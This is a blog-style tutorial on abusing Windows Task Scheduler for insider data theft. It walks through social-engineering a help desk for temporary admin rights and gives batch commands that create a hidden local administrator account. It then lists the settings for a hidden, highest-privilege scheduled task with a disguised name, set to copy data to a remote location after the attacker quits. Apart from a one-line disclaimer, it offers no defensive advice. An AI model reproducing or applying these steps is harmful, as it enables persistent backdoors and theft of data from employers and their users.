The Hidden Dangers of Microsoft’s Task Scheduler
by Gilbert Oviedo
Most Windows users run their computers on a daily basis and while they may take steps to protect themselves, hidden dangers lurk in the form of the “Task Scheduler”.
The task scheduler is a Microsoft program that mostly automates tasks used by Windows based on a variety of needs or triggers. It is also commonly used as a software updater for pesky applications such as Google, Adobe and a few others.
Most savvy users and malware programs peruse the startup folder and even the Registry keys related to the computer startup process and ignore the seldom used Task Scheduler.
The following information will describe a possible scenario in which a user’s computer can be used to steal data from the user or from the company the user works for. The data of value can be as simple as “Contact Lists, Current Projects, or Financial Status”. To a competitor, having that kind of knowledge is crucial.
This tutorial is only intended for educational purposes and not to be used in any way to commit digital cyber crimes.
The Thief: This person can be a corporate spy, a disgruntled employee, a fellow competitor, basically anyone with intent to steal.
The Victim: This person can be either the person whose data is stolen, or using his or hers credentials, data is stolen from other areas within the company.
The Prize: Data stored within the target computer or the company’s network drives
The New Hire
It is not uncommon for someone to pad their resumes with extra abilities that they do not possess in hopes of landing a job opportunity. And in some cases, a person is able to wing it using the mighty Google or YouTube. However, in some professions, winging it is not an option. You either know or don’t know the job at hand. Some companies may offer “On the Job Training” but most companies want you to hit the ground running and augment the team’s capabilities.
The Social Engineering Attack
Bob is the new programmer for a lab in medical hospital. Bob is the night-shift programmer who shares a computer with the day-shift programmer. A couple of weeks after Bob joins the lab, Bob calls the help-desk, who is also manned by the night-shift crew, and requests temporary administrative rights to his computer because he needs to install some software and it requires administrative rights.
A charming social engineer will disguise his or her true intentions and distract even the most disciplined of help-desk techs from what is about to occur.
So now the attacker inserts a USB flash drive, browses to a folder and executes a nondescript batch-file named setup.cmd using elevated rights using the task manager.
Launch “Task Manager”
Select “Show processes from all users”
Browse to your attack script and select “Create this task with admin privileges” and the UAC will not pop up
Unbeknownst to the tech, the script just executed this minimized batch-file
net user IIS_User !Qwerty! /add
net localgroup administrators IIS_User /add
install some normal-software.exe
The tech saw a quick command prompt shell and then observed some innocuous program being installed. Now the attacker has a local account with admin rights.
Once the targets have been identified, be it the victim’s local files or network data, the attacker sets up the data collector and outbound data process.
Setting up the Silent Partner
By using the user account created by the attacker earlier in the day, a hidden process is created using the Windows Task Scheduler.
Create a shortcut on the desktop that opens the task scheduler
Right-click on the shortcut, select “Run as a different user”
Type in the credentials of the silent partner account and click “OK”
Now you can create a task with the silent partner as the author
From the Actions pane, select “Create Task”
Give the task a familiar name like “User_Feed_Synchronization_local”
The following options are essential:
- Change the user to that of the local silent partner
- Select “Run whether user is logged on or not”
- Select “Run with highest privileges”
- Select “Hidden”
The attacker sets the “Trigger” date to occur a week after his intended last day of work.
The attacker’s actions will be dependent on the type and amount of data. In the “Actions” tab, the attacker may simply copy data to a remote location using basic commands.
In this scenario, the attacker gained access to a target company, set up a little silent partner, quit the company and waited to see if his little helper yielded fruit.
As people sometimes say, “Your Mileage May Vary” and this means the results will vary based on the capabilities or intent of the attacker and the established security counter measures of the target administrators. It is also noteworthy that in some cases, the local culture may influence how much security is observed or respected. In such cases, you will always have users with rogue computers and bad computer practices.
It is possible that there may be some corporate computers out there sending out data overtly, using programs designed to streamline Windows processes that can also enable someone to insert tasks masquerading as maintenance routines.
Author: Gilbert Oviedo
-IT-Professional since 1998
-Have Managed Novell, Microsoft, Linux, and Mac Servers.
-Security Focus in virus foot printing
-Knowledgeable in PowerShell, Auto-IT, .NET , VBScript, and Basic
-Words I live by: "If you have a hard time explaining it, then it is a bad idea" "Perception is our enabler, but it is also our limiting factor, if we can not perceive it, we cannot build it" -Without Wax